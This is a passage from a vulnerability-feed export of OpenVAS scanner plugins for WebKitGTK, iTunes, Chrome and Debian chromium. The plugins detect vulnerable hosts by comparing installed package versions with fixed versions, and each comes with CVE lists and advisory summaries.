exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:05", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-01-25T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates (HT209450)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-20346", "CVE-2019-6217", "CVE-2018-20505", "CVE-2019-6221", "CVE-2019-6233", "CVE-2019-6229", "CVE-2019-6227", "CVE-2019-6226", "CVE-2018-20506", "CVE-2019-6235", "CVE-2019-6234", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6212"], "modified": "2019-05-22T00:00:00", "id": "OPENVAS:1361412562310814822", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814822", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates (HT209450)\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814822\");\n script_version(\"2019-05-22T13:05:41+0000\");\n script_cve_id(\"CVE-2018-20346\", \"CVE-2018-20505\", \"CVE-2019-6212\", \"CVE-2019-6215\",\n \"CVE-2019-6216\", \"CVE-2019-6221\", \"CVE-2019-6227\", \"CVE-2019-6229\",\n \"CVE-2019-6233\", \"CVE-2018-20506\", \"CVE-2019-6217\", \"CVE-2019-6234\",\n \"CVE-2019-6235\", \"CVE-2019-6226\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:05:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-25 14:09:57 +0530 (Fri, 25 Jan 2019)\");\n script_name(\"Apple iTunes Security Updates (HT209450)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption issues.\n\n - An out-of-bounds read error.\n\n - A type confusion issue.\n\n - A logic issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to elevate\n privileges, conduct universal cross site scripting and execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.9.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.9.3 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209450\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nappVer = infos['version'];\nappPath = infos['location'];\n\nif(version_is_less(version:appVer, test_version:\"12.9.3\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"12.9.3\", install_path: appPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-08T12:54:09", "description": "The remote host is missing an update for\n the ", "cvss3": {}, "published": "2019-04-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3948-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8518", "CVE-2019-11070", "CVE-2019-8523", "CVE-2019-8563", "CVE-2019-8506", "CVE-2019-8559", "CVE-2019-8558", "CVE-2019-8551", "CVE-2019-6251", "CVE-2019-8544", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8375", "CVE-2019-8524"], "modified": "2020-01-06T00:00:00", "id": "OPENVAS:1361412562310843977", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843977", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843977\");\n script_version(\"2020-01-06T10:43:33+0000\");\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6251\", \"CVE-2019-8375\", \"CVE-2019-8506\",\n \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\",\n \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\",\n \"CVE-2019-8559\", \"CVE-2019-8563\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-06 10:43:33 +0000 (Mon, 06 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-17 02:00:36 +0000 (Wed, 17 Apr 2019)\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3948-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU18\\.10)\");\n\n script_xref(name:\"USN\", value:\"3948-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3948-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for\n the 'webkit2gtk' package(s) announced via the USN-3948-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version\n is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A large number of security issues were\ndiscovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\ninto viewing a malicious website, a remote attacker could exploit a variety of\nissues related to web browser security, including cross-site scripting attacks,\ndenial of service attacks, and arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"'webkit2gtk' package(s) on Ubuntu 18.10, Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.24.1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.24.1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.24.1-0ubuntu0.18.10.2\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.24.1-0ubuntu0.18.10.2\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3376-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-2538", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310843266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843266", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3376_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3376-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843266\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-03 07:16:13 +0200 (Thu, 03 Aug 2017)\");\n script_cve_id(\"CVE-2017-2538\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\",\n \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\",\n \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\",\n \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3376-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.04,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3376-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3376-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:52:37", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310814095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814095", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814095\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17476\", \"CVE-2018-17475\",\n \"CVE-2018-17474\", \"CVE-2018-17473\", \"CVE-2018-17462\", \"CVE-2018-17471\",\n \"CVE-2018-17470\", \"CVE-2018-17469\", \"CVE-2018-17468\", \"CVE-2018-17467\",\n \"CVE-2018-17466\", \"CVE-2018-17465\", \"CVE-2018-17464\", \"CVE-2018-17463\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 11:15:02 +0530 (Wed, 17 Oct 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Sandbox escape in AppCache.\n\n - An input validation error in V8.\n\n - Heap buffer overflow error in Little CMS in PDFium.\n\n - Multiple URL and UI spoofing errors in Omnibox and Extensions.\n\n - Multiple memory corruption errors in Angle and GPU Internals.\n\n - Multiple use after free errors in V8 and Blink.\n\n - Lack of limits on 'update' function in ServiceWorker.\n\n - Security UI occlusion in full screen mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attackers\n to bypass security restrictions, execute arbitrary code, conduct spoofing attack\n and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 70.0.3538.67 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 70.0.3538.67\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"70.0.3538.67\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"70.0.3538.67\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:53:47", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310814094", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814094", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814094\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17476\", \"CVE-2018-17475\",\n \"CVE-2018-17474\", \"CVE-2018-17473\", \"CVE-2018-17462\", \"CVE-2018-17471\",\n \"CVE-2018-17470\", \"CVE-2018-17469\", \"CVE-2018-17468\", \"CVE-2018-17467\",\n \"CVE-2018-17466\", \"CVE-2018-17465\", \"CVE-2018-17464\", \"CVE-2018-17463\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 10:35:08 +0530 (Wed, 17 Oct 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Sandbox escape in AppCache.\n\n - An input validation error in V8.\n\n - Heap buffer overflow error in Little CMS in PDFium.\n\n - Multiple URL and UI spoofing errors in Omnibox and Extensions.\n\n - Multiple memory corruption errors in Angle and GPU Internals.\n\n - Multiple use after free errors in V8 and Blink.\n\n - Lack of limits on 'update' function in ServiceWorker.\n\n - Security UI occlusion in full screen mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attackers\n to bypass security restrictions, execute arbitrary code, conduct spoofing attack\n and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 70.0.3538.67 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 70.0.3538.67\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"70.0.3538.67\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"70.0.3538.67\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:37", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2018-5179\nYannic Boneberger discovered an error in the ServiceWorker implementation.\n\nCVE-2018-17462\nNed Williamson and Niklas Baumstark discovered a way to escape the sandbox.\n\nCVE-2018-17463\nNed Williamson and Niklas Baumstark discovered a remote code execution\nissue in the v8 javascript library.\n\nCVE-2018-17464\nxisigr discovered a URL spoofing issue.\n\nCVE-2018-17465\nLin Zuojian discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2018-17466\nOmair discovered a memory corruption issue in the angle library.\n\nCVE-2018-17467\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-17468\nJams Lee discovered an information disclosure issue.\n\nCVE-2018-17469\nZhen Zhou discovered a buffer overflow issue in the pdfium library.\n\nCVE-2018-17470\nZhe Jin discovered a memory corruption issue in the GPU backend\nimplementation.\n\nCVE-2018-17471\nLnyas Zhang discovered an issue with the full screen user interface.\n\nCVE-2018-17473\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-17474\nZhe Jin discovered a use-after-free issue.\n\nCVE-2018-17475\nVladimir Metnew discovered a URL spoofing issue.\n\nCVE-2018-17476\nKhalil Zhani discovered an issue with the full screen user interface.\n\nCVE-2018-17477\nAaron Muir Hamilton discovered a user interface spoofing issue in the\nextensions pane.\n\nThis update also fixes a buffer overflow in the embedded lcms library included\nwith chromium.", "cvss3": {}, "published": "2018-11-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4330-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704330", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704330", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4330-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704330\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\",\n \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\",\n \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-17477\",\n \"CVE-2018-5179\");\n script_name(\"Debian Security Advisory DSA 4330-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-02 00:00:00 +0100 (Fri, 02 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n 